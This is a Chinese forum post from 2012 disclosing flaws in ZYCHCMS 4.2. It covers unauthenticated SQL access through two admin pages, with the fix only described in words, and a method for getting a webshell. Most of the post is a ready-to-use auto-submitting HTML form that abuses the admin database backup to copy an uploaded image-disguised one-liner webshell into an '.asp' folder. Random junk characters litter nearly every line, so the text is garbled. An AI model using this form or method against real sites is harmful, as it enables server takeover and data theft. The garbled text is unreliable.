: S$ l; {) k4 o3 p) u0 V0 d7 h
- A5 A6 K$ q3 u5 j: W [9 ^2 d9 { }* F' h
0 g; @8 t; V0 D" {$ ]& l( f
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
" f, L1 T* r! R- m! Q1 l ①SQL注射漏洞
. c! J' B. ^6 [+ K, K7 U, ~ 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp" x6 c: \' w2 i1 w$ I5 }
漏洞原因:未过滤4 N7 A6 |3 m2 j
漏洞代码:
! q& ~) m9 R/ f( {& n" v; u2 A 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。# i9 a! E6 ~ I4 q0 U( t; l
修复方法:在文件开头加入代码3 ?+ R; T. ?/ c1 L, E9 W) Q$ T
3 `! W, w7 [5 a4 t. J3 W) Q5 J9 |3 b, r% s7 Q
②后台拿WBSHELL
8 H- t3 `8 @. I+ M' u 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。; `# [# T" P5 M, O8 [
这里在网上找了一个,改了下,将就着用。 f% V: W4 t, Z
以下是代码本地提交代码
{+ F+ O& `* J& Z; g- @$ U( e
: V/ c3 Z0 C) Q* M& B& X
# ]: y) l7 g- V<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>3 g2 F4 _# C3 v% M) ~, i
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>- q) w; M- V6 {: W- q3 `; j4 w
<tr>
" @" o7 F: j% }" u% g3 h) W; s <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>" i$ _3 u' j7 K' H
</tr>% M& W- f9 q" N v* j) A
<tr>
4 h+ L; N: n. l+ }# b% R2 j% a <td bgcolor=”#FFFFFF”><span class=”back_southidc”>$ X+ T" ]% U3 i( o
</span>: w, ]. o L: i. |( C
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >8 T K% g. j3 L
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >" k7 ~* O/ c0 q& e: g$ ~' a# z+ l8 S
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>0 N- W& |7 z3 s- N" V0 r
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d+ O! [0 A+ n* f& m2 f1 b* c
<div align=”left”>; H9 }" z3 c1 k, a% y1 ]8 A
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />6 H% @* t/ _! N6 _
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
0 n* j% n+ _$ P3 W' S <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
( q$ P% F. u1 |5 \' N: O# y. A </div></td>8 ?; c) k; K* D/ `" m- `
</tr>
' t& z! b9 K' C" f. O <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>/ f6 F4 D5 D( _3 u3 p2 e& y1 d& f
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>( i/ C; w" V- @5 y6 i @; R
<td class=”td”><div align=”left”>: @) D5 E9 J) `4 ^9 n& B
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />1 H. c' R' @- g. h& n
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
! }+ r: }3 j& U1 T+ t# {1 p/ u </tr>; K& T' a+ @# q$ \8 e: }# I) q1 f
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>7 l L- P9 b& u4 Y4 C! L
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>; l6 Y" g! [) x) }% R, j( z( Z
<td class=”td”><div align=”left”>
3 ?# Z. V6 D7 Y! L <input type=”submit” value=”确定备份” class=”btn”; K+ @6 B' Q+ b3 C
</div></td>
* R3 ?1 q- v K5 c& Z- S+ W& ~ </tr>
1 O# D; }+ @0 q( k, _ </table></td></tr></form>( T& U9 M7 \3 u b! o# u
</table>
& B# e1 t0 L4 f. i) R4 x; F </td>- F. c9 A: e8 }2 z/ C8 D
</tr>
$ M* C; m+ ^7 R I( u( Q </table>6 o" O9 _+ e/ E4 V' P2 ~$ @
<script>$ N) f/ N5 N4 F1 K& q6 d& X+ E
document.all.add.submit();
# Z/ T4 e! Z, N2 |4 P </script>8 R- G2 V/ b9 i/ y) z+ H' F+ b
5 v2 y# Y# V) u8 }' ~( }$ x
0 K2 r4 j% N- I& e _( W* O5 H$ D& p! G. n ^; v
' J' Z* Z$ u- H/ ]& Y( ?
: n' ~7 ?+ S+ t8 M9 ]0 Q
! C: C+ N6 V- R8 @# ?1 k
- u& v0 f% K* U' P. B8 k* Y1 ]
' \9 C$ S! Y4 {8 V! t* T' }( r' q
3 B# H; l0 N! k3 T
' x3 {7 Q. F$ Y4 }3 h3 A5 d1 {9 n |
发表于 2012-9-10 21:09:51
收藏
支持
反对